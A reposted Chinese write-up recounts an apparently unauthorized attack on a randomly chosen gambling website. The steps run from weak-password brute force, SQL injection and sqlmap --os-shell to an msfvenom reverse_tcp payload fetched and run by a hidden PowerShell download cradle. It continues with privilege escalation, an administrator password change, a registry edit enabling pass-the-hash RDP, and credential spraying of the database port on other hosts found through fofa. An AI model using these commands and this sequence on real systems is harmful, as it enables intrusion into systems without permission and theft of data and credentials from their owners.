0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

某菠菜的渗透测试操作笔记

jf_hKIAo4na 来源:xz.aliyun 2024-01-04 15:54 次阅读

前言

闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。

弱口令

访问网站就是一个登录页面,没有验证码直接bp开启,成功爆出弱口令admin/123456,直接进入后台。

7302f86c-a062-11ee-8b88-92fbcf53809c.png

sql注入获取权限

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个/GroupMember.aspx?gid=参数上加上单引号,直接报错,SQL注入这不就来了么。

73161bc2-a062-11ee-8b88-92fbcf53809c.png

说干就干,直接SQLMAP

73318f38-a062-11ee-8b88-92fbcf53809c.png

发现为MSSQL,且DBA权限,直接--os-shell

734610ca-a062-11ee-8b88-92fbcf53809c.png

上线msf

已经获取普通权限,接下来就是上线msf提权。msf生成powershell脚本,并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

73532ea4-a062-11ee-8b88-92fbcf53809c.png

Vps开启监听

7359dc90-a062-11ee-8b88-92fbcf53809c.png

使用powershell上线session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

7361674e-a062-11ee-8b88-92fbcf53809c.png

如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题。我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。

https://r0yanx.com/tools/java_exec_encode/

提权

session已经上线,接下来目标就是获取system权限。很幸运直接getsystem可以获取system权限。如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

73668378-a062-11ee-8b88-92fbcf53809c.png

迁移一下进程,防止进程掉线。

73861e72-a062-11ee-8b88-92fbcf53809c.png

远程登录服务器

发现服务器开启3389端口,因为是system权限,且为2012系统,大于2008版本都是无法抓到明文密码,直接修改adminnistrator密码。(实战中不推荐直接修改管理员密码)

739ff342-a062-11ee-8b88-92fbcf53809c.png

73b4aff8-a062-11ee-8b88-92fbcf53809c.png

利用hash远程登录管理员账号

因为是win2012无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员NTLM远程登录机器。(并非同一台,这只是提供一个思路)

73b9c024-a062-11ee-8b88-92fbcf53809c.png

使用hash远程登录RDP,需要开启"Restricted Admin Mode"

// 开启Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已开启,0x0则表示开启
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

73be3938-a062-11ee-8b88-92fbcf53809c.png

成功利用hash远程管理员桌面

73c3bb06-a062-11ee-8b88-92fbcf53809c.png

73c7ec9e-a062-11ee-8b88-92fbcf53809c.png

其他

前期发现1433端口开放着,寻找数据库配置文件,登录数据库。

73d9a8bc-a062-11ee-8b88-92fbcf53809c.png

通过fofa找了一下,资产还是挺多的,且很多都开放1433端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,且都是sa权限。结束。

73f24818-a062-11ee-8b88-92fbcf53809c.png

审核编辑:黄飞

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9231

    浏览量

    85625
  • SQL
    SQL
    +关注

    关注

    1

    文章

    767

    浏览量

    44174
  • 端口
    +关注

    关注

    4

    文章

    978

    浏览量

    32102

原文标题:对某菠菜的渗透测试笔记

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    web渗透测试流程

      渗透测试是什么?网络安全学习中,web渗透测试流程是怎样的?后渗透的详细步骤解析如何?  渗透
    发表于 01-29 17:27

    有色Petri网在渗透测试中的应用

    渗透测试是常用的网络安全保障方法。该文细化现有渗透测试过程,针对传统渗透测试模型存在的不足提出一
    发表于 04-02 09:45 10次下载

    cad简单操作

    cad实用操作笔记
    发表于 12-23 02:15 5次下载

    DXP 2004简单操作

    DXP 2004实用操作笔记
    发表于 12-23 02:15 0次下载

    渗透测试工具开发

    渗透测试工具开发
    发表于 09-07 10:30 18次下载
    <b class='flag-5'>渗透</b><b class='flag-5'>测试</b>工具开发

    如何自己制作一个超声波测距模块详细制作笔记资料免费下载

    本文档的主要内容详细介绍的是如何自己制作一个超声波测距模块详细制作笔记资料免费下载。
    发表于 05-29 17:56 9次下载
    如何自己制作一个超声波测距模块详细制<b class='flag-5'>作笔记</b>资料免费下载

    如何使用低消耗设备进行破解和渗透测试的Deck操作模式资料说明

    的灵活性。操作员可以携带多个相同的Deck设备到达渗透测试地点,现场酌情选择合适的电源或其他选项(比如无线网卡、802.15.4猫等)。而不需要按照渗透
    发表于 05-09 18:15 0次下载

    嵌入式C语言的5个位操作笔记资料说明

    本文档的主要内容详细介绍的是嵌入式C语言的5个位操作笔记资料说明。
    发表于 05-08 18:19 3次下载
    嵌入式C语言的5个位<b class='flag-5'>操作笔记</b>资料说明

    菠菜为燃料电池供电!大力水手成真!

    大力水手吃菠菜给自己补充能量的画面,应该是每一个爱吃菠菜的小朋友的英雄。 不过,菠菜的能量可不止在动画片里,最近,菠菜真的能为燃料电池供电了! 这也令研究人员感到惊讶,美国
    的头像 发表于 10-23 16:00 1811次阅读

    基于STM32四轴飞控制作笔记

    这里写自定义目录标题基于STM32四轴飞控制作笔记新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容
    发表于 11-30 16:36 11次下载
    基于STM32四轴飞控制<b class='flag-5'>作笔记</b>

    白盒渗透测试的优势是什么

    渗透测试是一项重要的进攻性安全演习或操作。如果执行得当,它会极大地提高您组织的安全性。渗透测试分为三种类型,根据
    的头像 发表于 09-19 10:04 1239次阅读

    使用超声波传感器制作笔记本电脑触摸板HCSR 04

    电子发烧友网站提供《使用超声波传感器制作笔记本电脑触摸板HCSR 04.zip》资料免费下载
    发表于 10-31 09:58 0次下载
    使用超声波传感器制<b class='flag-5'>作笔记</b>本电脑触摸板HCSR 04

    渗透测试和边缘

    渗透测试和边缘
    的头像 发表于 01-03 09:45 616次阅读
    <b class='flag-5'>渗透</b><b class='flag-5'>测试</b>和边缘

    11款专家级渗透测试工具

    回顾过去,黑客入侵异常困难,需要大量手动操作。然而,如今,一整套自动化测试工具让黑客变成了“半机械人”,能够比以往任何时候都进行更多的测试。以下11款专家级渗透
    的头像 发表于 03-07 10:51 3410次阅读

    如何使用DudeSuite进行渗透测试工作

    Dude Suite 是一款集成化的Web渗透测试工具集,包含了Web渗透测试活动中使用频率非常高的功能,可以帮助我们高效地完成对Web应用程序的
    的头像 发表于 06-13 09:04 1662次阅读
    如何使用DudeSuite进行<b class='flag-5'>渗透</b><b class='flag-5'>测试</b>工作